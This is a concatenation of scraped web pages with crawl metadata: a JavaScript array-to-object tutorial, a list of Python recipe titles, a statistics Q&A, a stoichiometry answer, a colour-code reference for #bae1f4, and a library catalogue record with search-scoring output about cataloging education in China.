'Yeager',\nMikasa: 'Ackermann',\nArmin: 'Arlelt',\nLevi: 'Ackermann'\n}```\n\nApproach 3: In this approach, we first flatten the array using the Array.flat() method so that we get a one-dimensional array. We can then create an empty object and iterate the array to assign evenly positioned values as the key of the object and oddly positioned values as the value.\n\nExample:\n\n## Javascript\n\n `function` `arr2obj(arr) { ` ` `  `    ``// Flatten the array ` `    ``arr = arr.flat(); ` ` `  `    ``// Create an empty object ` `    ``let obj = {}; ` ` `  `    ``for` `(let i = 0; i < arr.length; i++) { ` `        ``if` `(i % 2 == 0) { ` ` `  `            ``// Extract the key and the value ` `            ``let key = arr[i]; ` `            ``let value = arr[i + 1]; ` ` `  `            ``// Assign the key and value ` `            ``obj[key] = value; ` `        ``} ` `    ``} ` ` `  `    ``return` `obj; ` `} ` ` `  `console.log( ` `    ``arr2obj([ ` `        ``[``\"Max\"``, 19], ` `        ``[``\"Chloe\"``, 20], ` `        ``[``\"Nathan\"``, 22], ` `        ``[``\"Mark\"``, 31], ` `    ``]) ` `); `\n\nOutput:\n\n```{\nMax: 19,\nChloe: 20,\nNathan: 22,\nMark: 31\n}```\n\nMy Personal Notes arrow_drop_up\nRecommended Articles\nPage :" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5509045,"math_prob":0.9626094,"size":2676,"snap":"2022-40-2023-06","text_gpt3_token_len":776,"char_repetition_ratio":0.13173653,"word_repetition_ratio":0.12804878,"special_character_ratio":0.34491777,"punctuation_ratio":0.22445256,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99754333,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T23:58:23Z\",\"WARC-Record-ID\":\"<urn:uuid:3226e33c-ca07-4bcc-8fdc-0b5a8c249162>\",\"Content-Length\":\"225039\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:21256c57-a0a5-4d91-b25f-e7dca1fee051>\",\"WARC-Concurrent-To\":\"<urn:uuid:796833bc-92f5-4552-9e4d-8b323068da2a>\",\"WARC-IP-Address\":\"44.228.100.190\",\"WARC-Target-URI\":\"https://origin.geeksforgeeks.org/how-to-convert-two-dimensional-array-into-an-object-in-javascript/?ref=lbp\",\"WARC-Payload-Digest\":\"sha1:X2QCQWNREWCF3KWPZFFITMP2WV632QSM\",\"WARC-Block-Digest\":\"sha1:TC4FO6DIXPTFOTTYIGR3OF27FATSZMTB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337680.35_warc_CC-MAIN-20221005234659-20221006024659-00034.warc.gz\"}"}
https://www.dezyre.com/recipes/company/mudracircle
[ "# Recipes used by Mudracircle developers\n\nCATEGORY\nHow to deal with an Item in a List in Python?\nHow to convert Strings to DateTimes in Python?\nHow to select DateTime within a range in Python?\nHow to deal with Rolling Time Window in Python?\nHow to introduce LAG time in Python?\nHow to deal with missing values in a Timeseries in Python?\nHow to encode Days of a week in Python?\nHow to calculate difference between Dates in Python?\nHow to split DateTime Data to create multiple feature in Python?\nHow to standardise IRIS Data in Python?\nHow to standardise features in Python?\nHow to rescale features in Python?\nHow to process categorical features in Python?\nOne hot Encoding with nominal categorical features in Python?\nOne hot Encoding with multiple labels in Python?\nHow to impute missing values with means in Python?\nHow to deal with outliers in Python?\nHow to deal with imbalance classes with upsampling in Python?\nHow to deal with imbalance classes with downsampling in Python?\nHow to encode ordinal categorical features in Python?\nHow to find outliers in Python?\nHow to delete instances with missing values in Python?\nHow to impute missing class labels using nearest neighbours in Python?\nHow to impute missing class labels in Python?\nHow to convert Categorical features to Numerical Features in Python?\nHow to prepare a machine learning workflow in Python?\nHow to Create simulated data for clustering in Python?\nHow to Create simulated data for classification in Python?\nHow to Create simulated data for regression in Python?\nHow to load sklearn Boston Housing data?\nHow to load features from a Dictionary in python?\nHow to add and subtract between matrices?\nHow to Divide each element of a matrix by a numerical value?\nHow to MULTIPLY numerical value to each element of a matrix?\nHow to SUBTRACT numerical value to each element of a matrix?\nHow to ADD numerical value to each element of a matrix?\nHow to calculate dot product of two vectors?\nHow to find Maximum and Minimum values in a Matrix?\nHow to find the Rank of a Matrix?\nHow to create RANDOM Numbers in Python?\nHow to define WHILE Loop in Python?\nHow to define FOR Loop in Python?\nHow to deal with Dictionary Basics in Python?\nHow to Create and Delete a file in Python?\nHow to convert STRING to DateTime in Python?\nHow to use CONTINUE and BREAK statement within a loop in Python?\nHow to do numerical operations in Python using Numpy?\nHow to Flatten a Matrix?\nHow to Calculate Determinant of a Matrix or ndArray?\nHow to calculate Diagonal of a Matrix?\nHow to Calculate Trace of a Matrix?\nHow to invert a matrix or nArray in Python?\nHow to convert a dictionary to a matrix or nArray in Python?\nHow to reshape a Numpy array in Python?\nHow to select elements from Numpy array in Python?\nHow to create a sparse Matrix in Python?\nHow to Create a Vector or Matrix in Python?\nHow to randomly sample a Pandas DataFrame?\nHow to rank a Pandas DataFrame?\nHow to format string in a Pandas DataFrame Column?\nHow to create Pivot table using a Pandas DataFrame?\nHow to Normalise a Pandas DataFrame Column?\nHow to calculate MOVING AVG in a Pandas DataFrame?\nHow to deal with missing values in a Pandas DataFrame?\nHow to map values in a Pandas DataFrame?\nHow to list unique values in a Pandas DataFrame?\nHow to JOIN and MERGE Pandas DataFrame?\nHow to group rows in a Pandas DataFrame?\nHow to find the largest value in a Pandas DataFrame?\nHow to filter in a Pandas DataFrame?\nHow to drop ROW and COLUMN in a Pandas DataFrame?\nHow to get descriptive statistics of a Pandas DataFrame?\nHow to delete duplicates from a Pandas DataFrame?\nHow to create crosstabs from a Dictionary in Python?\nHow to create a new column based on a condition in Python?\nHow to insert a new column based on condition in Python?\nHow to convert string variables into DateTime variables in Python?\nHow to convert string categorical variables into numerical variables using Label Encoder?\nHow to convert string categorical variables into numerical variables in Python?\nHow to convert categorical variables into numerical variables in Python?\nHow to preprocess string data within a Pandas DataFrame?\nCompanies using Recipes\n20 developers from Tata Consultancy Services\n14 developers from Infosys\n11 developers from IBM\n9 developers from Accenture\n9 developers from Cognizant\n7 developers from Capgemini\n6 developers from Wipro\n6 developers from Microsoft\n6 developers from Tech Mahindra\n4 developers from Societe Generale" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7066685,"math_prob":0.65950316,"size":4152,"snap":"2020-34-2020-40","text_gpt3_token_len":923,"char_repetition_ratio":0.32569912,"word_repetition_ratio":0.25,"special_character_ratio":0.21050097,"punctuation_ratio":0.10214376,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9890758,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-07T00:07:11Z\",\"WARC-Record-ID\":\"<urn:uuid:64bb73d2-b2cd-4aea-a210-90f571e57f63>\",\"Content-Length\":\"58545\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f5ebde56-5429-40aa-be8a-53df67adb0af>\",\"WARC-Concurrent-To\":\"<urn:uuid:44e4f16b-ee98-47be-90ec-aa1095f08c00>\",\"WARC-IP-Address\":\"184.173.29.42\",\"WARC-Target-URI\":\"https://www.dezyre.com/recipes/company/mudracircle\",\"WARC-Payload-Digest\":\"sha1:KZQSV7Z7A27NR3SHAYI6USRLGIO4LB7J\",\"WARC-Block-Digest\":\"sha1:D5QXCA2GR2SZF3QIH6DXU2UCOQHLAHDV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439737050.56_warc_CC-MAIN-20200807000315-20200807030315-00349.warc.gz\"}"}
https://stats.stackexchange.com/questions/67537/permutation-bootstrapping-for-testing-difference-of-difference
[ "# permutation/bootstrapping for testing difference of difference\n\nI have a situation where I have 3 treatments/conditions A, B, C. For each condition I have multiple trials.\n\nI compare the means of trials under each condition A, B and C. This gives me 3 values.\n\nThen I am computing a difference A-B and A-C. I need to obtain confidence interval/error bars for the single value obtained when I do the subtraction of mean response to condition A and mean response to condition B (A-B) same goes for A-C. Essentially I want to ask is the difference seen in mean response A-B different from mean response A-C.\n\nI know potentially some bootstrapping/permutation test is what is needed but not sure which way to do this since its not a direct comparison of mean of A vs mean of B but rather A-B compared to A-C. Help will be appreciated.\n\n• Why aren't you just testing B vs. C? Getting the difference from A for both only changes the mean B vs. C by a constant but increases each ones' variability.\n– John\nAug 16, 2013 at 4:03\n• What I omitted is that A-B and A-C go through a non-linear function gfp and I need a mean and confidence on the output of gfp values. Aug 16, 2013 at 6:17\n• Then can you please put the information that we need to answer the question ... in the question? I'd start with an explanation of whatever that comment was trying to explain. Aug 16, 2013 at 6:32\n\n$H_0: \\mu_{A-B} - \\mu_{A-C} = 0$ vs its negation\nBut this is testing whether $(\\mu_A - \\mu_B) - (\\mu_A - \\mu_C)$ differs from 0.\nCancel out the $\\mu_A$ terms leaving: $H_0: \\mu_C - \\mu_B = 0$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9397324,"math_prob":0.8636562,"size":763,"snap":"2023-40-2023-50","text_gpt3_token_len":171,"char_repetition_ratio":0.14097497,"word_repetition_ratio":0.0,"special_character_ratio":0.21756226,"punctuation_ratio":0.073619634,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.995689,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T04:49:58Z\",\"WARC-Record-ID\":\"<urn:uuid:6bbe2b9d-fe73-47f2-83d4-ff0da4b7b93e>\",\"Content-Length\":\"164108\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4c92b0f9-4fe6-4643-be18-9b43123a9ad6>\",\"WARC-Concurrent-To\":\"<urn:uuid:73e9e706-642a-4aa8-b04e-f228756ff78f>\",\"WARC-IP-Address\":\"104.18.43.226\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/67537/permutation-bootstrapping-for-testing-difference-of-difference\",\"WARC-Payload-Digest\":\"sha1:ANAK5TGHCSUVQ6C6M4ITXWQ3MRKKZS36\",\"WARC-Block-Digest\":\"sha1:4JFTF7LW2A576ASHBRRS4VAISHLJ54EH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679101195.85_warc_CC-MAIN-20231210025335-20231210055335-00357.warc.gz\"}"}
https://www.assignmentexpert.com/homework-answers/chemistry/inorganic-chemistry/question-110004
[ "# Answer to Question #110004 in Inorganic Chemistry for Nick\n\nQuestion #110004\nThe reaction between potassium chlorate and red phosphorus takes place when you strike a match on a matchbox. If you were to react 51.7 g of potassium chlorate (KClO3) with excess red phosphorus, what mass of tetraphosphorus decaoxide (P4O10) would be produced?\n1\n2020-04-18T07:00:39-0400\n\nThe reaction is:\n\n10KClO3(s) + 3P4(s) = 3P4O10(s) + 10KCl(s)\n\nConvert to moles:\n\nn(KClO3) = m/M = 51.7g/122.55g/mol = 0.422 mol\n\nMultiply by mole ratio:\n\nn(P4O10) = n(KClO3)*3/10 = 0.127 mol\n\nConvert to grams:\n\nm(P4O10) = n*M = 0.127mol*283.89g/mol = 36.05 g\n\nNeed a fast expert's response?\n\nSubmit order\n\nand get a quick answer at the best price\n\nfor any assignment or question with DETAILED EXPLANATIONS!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63466084,"math_prob":0.9664914,"size":276,"snap":"2021-31-2021-39","text_gpt3_token_len":132,"char_repetition_ratio":0.121323526,"word_repetition_ratio":0.0,"special_character_ratio":0.51449275,"punctuation_ratio":0.1594203,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98811173,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T06:32:39Z\",\"WARC-Record-ID\":\"<urn:uuid:81517a5a-8d2d-4f4b-b354-667fb527ef1d>\",\"Content-Length\":\"557645\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2bbdddd7-9240-4698-ab5c-672ae12cffce>\",\"WARC-Concurrent-To\":\"<urn:uuid:73a75a9d-ce85-4c7a-8037-3d8c40f8c79b>\",\"WARC-IP-Address\":\"52.24.16.199\",\"WARC-Target-URI\":\"https://www.assignmentexpert.com/homework-answers/chemistry/inorganic-chemistry/question-110004\",\"WARC-Payload-Digest\":\"sha1:ORZUWVAMRA5Q3EGNXVK7CJYP4Q6NXXZ2\",\"WARC-Block-Digest\":\"sha1:DRKNTEF7RQLQA6UUDEBJIITPGNLHICHL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057504.60_warc_CC-MAIN-20210924050055-20210924080055-00277.warc.gz\"}"}
https://www.colorhexa.com/bae1f4
[ "# #bae1f4 Color Information\n\nIn a RGB color space, hex #bae1f4 is composed of 72.9% red, 88.2% green and 95.7% blue. Whereas in a CMYK color space, it is composed of 23.8% cyan, 7.8% magenta, 0% yellow and 4.3% black. It has a hue angle of 199.7 degrees, a saturation of 72.5% and a lightness of 84.3%. #bae1f4 color hex could be obtained by blending #ffffff with #75c3e9. Closest websafe color is: #ccccff.\n\n• R 73\n• G 88\n• B 96\nRGB color chart\n• C 24\n• M 8\n• Y 0\n• K 4\nCMYK color chart\n\n#bae1f4 color description : Very soft blue.\n\n# #bae1f4 Color Conversion\n\nThe hexadecimal color #bae1f4 has RGB values of R:186, G:225, B:244 and CMYK values of C:0.24, M:0.08, Y:0, K:0.04. Its decimal value is 12247540.\n\nHex triplet RGB Decimal bae1f4 `#bae1f4` 186, 225, 244 `rgb(186,225,244)` 72.9, 88.2, 95.7 `rgb(72.9%,88.2%,95.7%)` 24, 8, 0, 4 199.7°, 72.5, 84.3 `hsl(199.7,72.5%,84.3%)` 199.7°, 23.8, 95.7 ccccff `#ccccff`\nCIE-LAB 87.397, -8.576, -13.446 63.5, 70.819, 95.907 0.276, 0.308, 70.819 87.397, 15.948, 237.469 87.397, -20.615, -19.793 84.154, -12.579, -8.662 10111010, 11100001, 11110100\n\n# Color Schemes with #bae1f4\n\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #f4cdba\n``#f4cdba` `rgb(244,205,186)``\nComplementary Color\n• #baf4ea\n``#baf4ea` `rgb(186,244,234)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #bac4f4\n``#bac4f4` `rgb(186,196,244)``\nAnalogous Color\n• #f4eaba\n``#f4eaba` `rgb(244,234,186)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #f4bac4\n``#f4bac4` `rgb(244,186,196)``\nSplit Complementary Color\n• #e1f4ba\n``#e1f4ba` `rgb(225,244,186)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #f4bae1\n``#f4bae1` `rgb(244,186,225)``\n• #baf4cd\n``#baf4cd` `rgb(186,244,205)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #f4bae1\n``#f4bae1` `rgb(244,186,225)``\n• #f4cdba\n``#f4cdba` `rgb(244,205,186)``\n• #78c4e9\n``#78c4e9` `rgb(120,196,233)``\n• #8eceed\n``#8eceed` `rgb(142,206,237)``\n• #a4d7f0\n``#a4d7f0` `rgb(164,215,240)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #d0ebf8\n``#d0ebf8` `rgb(208,235,248)``\n• #e6f4fb\n``#e6f4fb` `rgb(230,244,251)``\n• #fcfeff\n``#fcfeff` `rgb(252,254,255)``\nMonochromatic Color\n\n# Alternatives to #bae1f4\n\nBelow, you can see some colors close to #bae1f4. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #baf0f4\n``#baf0f4` `rgb(186,240,244)``\n• #baebf4\n``#baebf4` `rgb(186,235,244)``\n• #bae6f4\n``#bae6f4` `rgb(186,230,244)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n``#badcf4` `rgb(186,220,244)``\n``#bad7f4` `rgb(186,215,244)``\n``#bad3f4` `rgb(186,211,244)``\nSimilar Colors\n\n# #bae1f4 Preview\n\nThis text has a font color of #bae1f4.\n\n``<span style=\"color:#bae1f4;\">Text here</span>``\n#bae1f4 background color\n\nThis paragraph has a background color of #bae1f4.\n\n``<p style=\"background-color:#bae1f4;\">Content here</p>``\n#bae1f4 border color\n\nThis element has a border color of #bae1f4.\n\n``<div style=\"border:1px solid #bae1f4;\">Content here</div>``\nCSS codes\n``.text {color:#bae1f4;}``\n``.background {background-color:#bae1f4;}``\n``.border {border:1px solid #bae1f4;}``\n\n# Shades and Tints of #bae1f4\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #020b10 is the darkest color, while #fefeff is the lightest one.\n\n• #020b10\n``#020b10` `rgb(2,11,16)``\n• #051821\n``#051821` `rgb(5,24,33)``\n• #082431\n``#082431` `rgb(8,36,49)``\n• #0b3042\n``#0b3042` `rgb(11,48,66)``\n• #0d3c53\n``#0d3c53` `rgb(13,60,83)``\n• #104964\n``#104964` `rgb(16,73,100)``\n• #135575\n``#135575` `rgb(19,85,117)``\n• #156186\n``#156186` `rgb(21,97,134)``\n• #186d97\n``#186d97` `rgb(24,109,151)``\n• #1b7aa8\n``#1b7aa8` `rgb(27,122,168)``\n• #1d86b9\n``#1d86b9` `rgb(29,134,185)``\n• #2092ca\n``#2092ca` `rgb(32,146,202)``\n• #239edb\n``#239edb` `rgb(35,158,219)``\n• #33a6de\n``#33a6de` `rgb(51,166,222)``\n• #44aee1\n``#44aee1` `rgb(68,174,225)``\n• #54b5e4\n``#54b5e4` `rgb(84,181,228)``\n• #65bce7\n``#65bce7` `rgb(101,188,231)``\n• #76c4e9\n``#76c4e9` `rgb(118,196,233)``\n• #87cbec\n``#87cbec` `rgb(135,203,236)``\n• #98d2ef\n``#98d2ef` `rgb(152,210,239)``\n• #a9daf1\n``#a9daf1` `rgb(169,218,241)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #cbe8f7\n``#cbe8f7` `rgb(203,232,247)``\n• #dcf0f9\n``#dcf0f9` `rgb(220,240,249)``\n• #edf7fc\n``#edf7fc` `rgb(237,247,252)``\n• #fefeff\n``#fefeff` `rgb(254,254,255)``\nTint Color Variation\n\n# Tones of #bae1f4\n\nA tone is produced by adding gray to any pure hue. In this case, #d6d7d8 is the less saturated color, while #b1e4fd is the most saturated one.\n\n• #d6d7d8\n``#d6d7d8` `rgb(214,215,216)``\n• #d3d9db\n``#d3d9db` `rgb(211,217,219)``\n``#d0dade` `rgb(208,218,222)``\n• #ccdbe2\n``#ccdbe2` `rgb(204,219,226)``\n• #c9dce5\n``#c9dce5` `rgb(201,220,229)``\n• #c6dde8\n``#c6dde8` `rgb(198,221,232)``\n• #c3deeb\n``#c3deeb` `rgb(195,222,235)``\n• #c0dfee\n``#c0dfee` `rgb(192,223,238)``\n• #bde0f1\n``#bde0f1` `rgb(189,224,241)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #b7e2f7\n``#b7e2f7` `rgb(183,226,247)``\n• #b4e3fa\n``#b4e3fa` `rgb(180,227,250)``\n• #b1e4fd\n``#b1e4fd` `rgb(177,228,253)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #bae1f4 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5042157,"math_prob":0.64282244,"size":3730,"snap":"2021-31-2021-39","text_gpt3_token_len":1710,"char_repetition_ratio":0.12399356,"word_repetition_ratio":0.011090573,"special_character_ratio":0.5254692,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95307726,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-05T18:54:26Z\",\"WARC-Record-ID\":\"<urn:uuid:22d34f0f-a496-4b3c-9bb1-f8b41421baa9>\",\"Content-Length\":\"36248\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9aabfba2-f8ce-4261-babc-02ccb1c87eb8>\",\"WARC-Concurrent-To\":\"<urn:uuid:1b010d67-5403-42b7-9483-f2eaecce610a>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/bae1f4\",\"WARC-Payload-Digest\":\"sha1:XK6G2BPXMUYAYUKUT3SX4HB5UD6YJTOA\",\"WARC-Block-Digest\":\"sha1:XPQPEM5LD4LSLFEQZ5773IXZXH5W4T3D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046156141.29_warc_CC-MAIN-20210805161906-20210805191906-00403.warc.gz\"}"}
https://ixtrieve.fh-koeln.de/birds/litie/document/12614
[ "# Document (#12614)\n\nAuthor\nSi, L.\nTitle\n¬The status quo and future development of cataloging and classification education in China\nSource\nCataloging and classification quarterly. 41(2005) no.2, S.85-103\nYear\n2005\nAbstract\nThis article depicts the status quo of cataloging and classification education in China, including the library science programs, their curricula, the degrees offered, the contents of courses, and the selection of textbooks. It also analyzes the current problems in library science programs and projects the possible improvements and progress in the teaching in the next five to ten years.\nFootnote\nBeitrag eines Themenheftes \"Education for cataloging: international perspectives. Part I\"\nTheme\nAusbildung\nLocation\nChina\n\n## Similar documents (content)\n\n1. Zhanghua, M.: ¬The education of cataloging and classification in China (2005) 0.72\n```0.71667415 = sum of:\n0.71667415 = product of:\n1.4930712 = sum of:\n0.062483825 = weight(abstract_txt:contents in 751) [ClassicSimilarity], result of:\n0.062483825 = score(doc=751,freq=1.0), product of:\n0.13809718 = queryWeight, product of:\n1.249942 = boost\n5.7915225 = idf(docFreq=358, maxDocs=43254)\n0.019076655 = queryNorm\n0.4524627 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.7915225 = idf(docFreq=358, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.088879324 = weight(abstract_txt:teaching in 751) [ClassicSimilarity], result of:\n0.088879324 = score(doc=751,freq=2.0), product of:\n0.13863203 = queryWeight, product of:\n1.2523601 = boost\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.019076655 = queryNorm\n0.6411168 = fieldWeight in 751, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.06941103 = weight(abstract_txt:offered in 751) [ClassicSimilarity], result of:\n0.06941103 = score(doc=751,freq=1.0), product of:\n0.148124 = queryWeight, product of:\n1.2945241 = boost\n5.998091 = idf(docFreq=291, maxDocs=43254)\n0.019076655 = queryNorm\n0.46860087 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.998091 = idf(docFreq=291, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.02078936 = weight(abstract_txt:library in 751) [ClassicSimilarity], result of:\n0.02078936 = score(doc=751,freq=1.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.24884598 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.20431964 = weight(abstract_txt:courses in 751) [ClassicSimilarity], result of:\n0.20431964 = score(doc=751,freq=4.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n1.0660648 = fieldWeight in 751, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.20803992 = weight(abstract_txt:curricula in 751) [ClassicSimilarity], result of:\n0.20803992 = score(doc=751,freq=2.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n0.8512409 = fieldWeight in 751, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.03792717 = weight(abstract_txt:science in 751) [ClassicSimilarity], result of:\n0.03792717 = score(doc=751,freq=1.0), product of:\n0.124733575 = queryWeight, product of:\n1.67998 = boost\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.019076655 = queryNorm\n0.30406544 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.07119972 = weight(abstract_txt:classification in 751) [ClassicSimilarity], result of:\n0.07119972 = score(doc=751,freq=3.0), product of:\n0.13161181 = queryWeight, product of:\n1.7256783 = boost\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.019076655 = queryNorm\n0.5409828 = fieldWeight in 751, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.07911239 = weight(abstract_txt:cataloging in 751) [ClassicSimilarity], result of:\n0.07911239 = score(doc=751,freq=1.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n0.38850662 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.21448134 = weight(abstract_txt:education in 751) [ClassicSimilarity], result of:\n0.21448134 = score(doc=751,freq=6.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.9843824 = fieldWeight in 751, product of:\n2.4494898 = tf(freq=6.0), with freq of:\n6.0 = termFreq=6.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.13811357 = weight(abstract_txt:programs in 751) [ClassicSimilarity], result of:\n0.13811357 = score(doc=751,freq=1.0), product of:\n0.29523918 = queryWeight, product of:\n2.5846362 = boost\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.019076655 = queryNorm\n0.46780232 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.2983139 = weight(abstract_txt:china in 751) [ClassicSimilarity], result of:\n0.2983139 = score(doc=751,freq=2.0), product of:\n0.39155135 = queryWeight, product of:\n2.9765062 = boost\n6.8957214 = idf(docFreq=118, maxDocs=43254)\n0.019076655 = queryNorm\n0.76187676 = fieldWeight in 751, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n6.8957214 = idf(docFreq=118, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.48 = coord(12/25)\n```\n2. Kokabi, M.: ¬An account of cataloging and classification education in Iranian universities (2005) 0.45\n```0.44835687 = sum of:\n0.44835687 = product of:\n1.0189929 = sum of:\n0.047580045 = weight(abstract_txt:years in 762) [ClassicSimilarity], result of:\n0.047580045 = score(doc=762,freq=2.0), product of:\n0.09140003 = queryWeight, product of:\n1.0168821 = boost\n4.711655 = idf(docFreq=1056, maxDocs=43254)\n0.019076655 = queryNorm\n0.52056926 = fieldWeight in 762, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.711655 = idf(docFreq=1056, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.088879324 = weight(abstract_txt:teaching in 762) [ClassicSimilarity], result of:\n0.088879324 = score(doc=762,freq=2.0), product of:\n0.13863203 = queryWeight, product of:\n1.2523601 = boost\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.019076655 = queryNorm\n0.6411168 = fieldWeight in 762, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.06691968 = weight(abstract_txt:next in 762) [ClassicSimilarity], result of:\n0.06691968 = score(doc=762,freq=1.0), product of:\n0.14455806 = queryWeight, product of:\n1.278847 = boost\n5.925452 = idf(docFreq=313, maxDocs=43254)\n0.019076655 = queryNorm\n0.46292597 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq 